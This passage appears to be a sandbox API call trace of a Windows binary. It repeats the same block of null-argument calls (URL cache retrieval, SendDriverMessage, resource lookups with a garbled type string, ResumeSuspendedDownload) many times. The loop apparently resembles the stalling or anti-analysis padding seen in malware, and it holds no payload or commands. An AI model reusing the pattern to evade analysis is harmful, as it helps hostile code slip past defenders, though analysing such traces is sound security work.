0 [0185.687] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.687] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.687] GetUserDefaultLangID () returned 0x409 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.687] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.687] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.687] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.687] GetUserDefaultLangID () returned 0x409 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.687] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.687] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.688] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.688] GetUserDefaultLangID () returned 0x409 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.688] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.688] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.688] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.688] GetUserDefaultLangID () returned 0x409 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.688] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.688] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.688] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.688] GetUserDefaultLangID () returned 0x409 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.688] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.688] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.688] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.688] GetUserDefaultLangID () returned 0x409 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.688] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.688] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.688] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.688] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.688] GetUserDefaultLangID () returned 0x409 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.688] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.688] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.688] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.689] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.689] GetUserDefaultLangID () returned 0x409 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.689] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.689] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.689] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.689] GetUserDefaultLangID () returned 0x409 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.689] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.689] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.689] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.689] GetUserDefaultLangID () returned 0x409 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.689] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.689] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.689] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.689] GetUserDefaultLangID () returned 0x409 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.689] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.689] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.689] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.689] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.689] GetUserDefaultLangID () returned 0x409 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.689] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.689] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.738] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.738] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.738] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.738] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.738] GetUserDefaultLangID () returned 0x409 [0185.738] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.738] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.738] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.738] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.738] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.738] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.738] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.738] GetUserDefaultLangID () returned 0x409 [0185.738] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.738] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.738] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.738] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.738] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.738] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.738] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.738] GetUserDefaultLangID () returned 0x409 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.739] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.739] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.739] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.739] GetUserDefaultLangID () returned 0x409 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.739] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.739] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.739] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.739] GetUserDefaultLangID () returned 0x409 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.739] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.739] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.739] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.739] GetUserDefaultLangID () returned 0x409 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.739] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.739] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.739] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.739] GetUserDefaultLangID () returned 0x409 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.739] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.739] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.739] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.739] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.739] GetUserDefaultLangID () returned 0x409 [0185.739] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.740] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.740] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.740] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.740] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.740] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.741] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.741] GetUserDefaultLangID () returned 0x409 [0185.741] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.741] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.741] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.741] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.741] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.741] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.741] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.741] GetUserDefaultLangID () returned 0x409 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.742] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.742] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.742] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.742] GetUserDefaultLangID () returned 0x409 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.742] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.742] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.742] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.742] GetUserDefaultLangID () returned 0x409 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.742] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.742] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.742] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.742] GetUserDefaultLangID () returned 0x409 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.742] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.742] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.742] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.742] GetUserDefaultLangID () returned 0x409 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.742] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.742] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.742] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.742] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.742] GetUserDefaultLangID () returned 0x409 [0185.742] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.743] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 